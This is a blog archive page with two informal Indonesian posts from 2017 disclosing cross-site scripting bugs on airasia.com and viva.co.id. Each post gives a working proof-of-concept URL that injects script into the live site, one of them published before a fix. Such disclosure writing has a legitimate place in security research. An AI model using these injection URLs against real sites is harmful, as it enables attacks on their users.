Posts

Showing posts from July, 2017

Airasia.com | Bug Cross-Site-Scripting On Airasia.com

-
Image
Airasia.com | Bug Cross-Site-Scripting On Airasia.com Hey Guys Kali Ini Saya IG : https://Instagram.com/anggi_gunawan17  Promosi :D Akan Share Bug Xss Di Website Airasia.com Dan Sebelum nya Saya Minta maaf Kepada Pihak Airasia.com Karna Share POC Bug Sebelum Bug Itu di Fix knapa?  Saya sudah Kontak Lewat email Udah 1 Minggu Guys -_- ga Di Respon Ok Langsung Aja Ke TKP POC : 1. Gunain Nih Url  : http://seatavailability.airasia.com/index-pjson.php?pcd=rr1510107&c=hk/zh&a=XIY&h=hk/zh%27;}}alert(%27XSS%27);v=function(){{b=%27 2. Langsung copad aja Guys Males Ketik Klo ga ada Bounty Reward :'v • 19 Juli 2017 - Report Via email • 29 juli 2017 - belum Di Respon Nb : Yang Beruntung Aja Tuh Laporin Saya udah Kenyang Sama Bounty reward + terima Kasih :v
Post a Comment
Read more

Viva.co.id | Bug Xss On Viva.co.id

-
Image
How I Find This Bug Xss In Viva.co.id Hay Guys Ini Postingan Sekaligus Perjalanan Bug Hunter saya Nih Hehe.. Curhat Dikit. Oke Langsung Aja, Di Bawah Ini ada POC Bagai Mana Saya Menemukan Bug Xss (CROSS-SITE-SCRIPTING) di Viva.co.id   POC :  1. Gunakan Url : http://log.viva.co.id/frame/read/ 2. Script Xss Yang Udah Di Encrpy Base64 :  Ij48c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmRvbWFpbik7IDwvc2NyaXB0Pg== 3. Kita Tempel Di Belakang Url jadi : http://log.viva.co.id/frame/read/Ij48c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmRvbWFpbik7IDwvc2NyaXB0Pg== 4. Setelah Itu Tempel di Address Bar Lalu Enter Tara.. Jreng.… jreng… jreng… Muncul Tuh Kotak Alert Dan Sangat Di Sayangkan Guys Website dalam Negri Jarang Kasih Bounty Reward :'( Udah Capek" Kan Cari Bug Malah Dapet Terima Kasih :'( • 20 juli 2017 - Bug Report • 20 juli 2017 - Bug Confirm And Prosses Fixed • 23 Juli 2017 - Owner Tanya Apa Anda Mau bergabung Bersama Viva.co.id Developers • 24 Juli 2017 - Saya Balas Apa Viva.co.id Me
1 comment
Read more